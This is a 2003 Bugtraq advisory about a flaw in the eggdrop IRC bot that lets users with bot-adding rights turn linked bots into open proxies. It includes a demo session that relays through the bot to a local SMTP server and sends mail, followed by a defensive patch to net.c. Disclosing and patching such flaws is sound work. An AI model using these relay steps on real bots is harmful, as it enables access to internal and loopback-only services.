[28831] in bugtraq
Eggdrop arbitrary connection vulnerability
daemon@ATHENA.MIT.EDU (Paul Starzetz)
Mon Feb 10 09:50:20 2003
Message-ID: <3E46AFB2.8040801@starzetz.de>
Date: Sun, 09 Feb 2003 20:44:50 +0100
From: Paul Starzetz <paul@starzetz.de>
MIME-Version: 1.0
To: bugtraq@securityfocus.com, vendor-sec <vendor-sec@lst.de>
Content-Type: text/plain; charset=ISO-8859-1; format=flowed
Content-Transfer-Encoding: 7bit
Hi,
there is a serious security problem in the popular eggdrop IRCbot. The
hole allows a regular user with enough 'power' (at least power to add
new bot records) to use any linked instance of the bot on the botnet as
an instant 'proxy'. The following session demonstrates the problem with
an out-of-the-box eggdrop 1.6.10:
.+bot bighole 127.0.0.1:25
[20:23] #IhaQuer# +bot bighole 127.0.0.1:25
Added bot 'bighole' with address '127.0.0.1:25' and no password.
You'll want to add a hostmask if this bot will ever be on any channels
that I'm on.
[20:23] #IhaQuer# match bighole
*** Matching 'bighole':
HANDLE PASS NOTES FLAGS LAST
bighole no 0 b never (nowhere )
ADDRESS: 127.0.0.1
users: 25, bots: 25
--- Found 1 match.
.relay bighole
[20:23] #IhaQuer# relay bighole
Connecting to bighole @ 127.0.0.1:25 ...
(Type *BYE* on a line by itself to abort.)
Success!
NOW CONNECTED TO RELAY BOT bighole ...
(You can type *BYE* to prematurely close the connection.)
*** IhaQuer left the party line.
220 server.org ESMTP Postfix
HELO blahblah.org
250 server.org
MAIL from: blahblah.org
250 Ok
rcpt to: ihaquer@gmx.de
250 Ok
data
354 End data with <CR><LF>.<CR><LF>
blah blah
.
250 Ok: queued as CFDFC2F012
Obviously an email has been sent by the local postfix bound to the
loopback address 127.0.0.1! The impact may depend on the host the bot is
running on, including tunneling into internal networks, accessing
services bound to the loopback only, bypassing TCP wrappers etc, etc.
There is no clean solution so far, for my own I decided to modify the
net.c file and add something like:
int open_telnet_raw(int sock, char *server, int sport)
.
.
.
name.sin_family = AF_INET;
name.sin_port = htons(port);
+ if(port < 1024 && port != 113) {
+ putlog(LOG_MISC, "*", "WARNING attempt to connect to low port
%s:%d", server, port);
+ return -1;
+ }
Hope this helps, thanks to Maciek Kroenke for bringing my attention to
this bug,
/ih
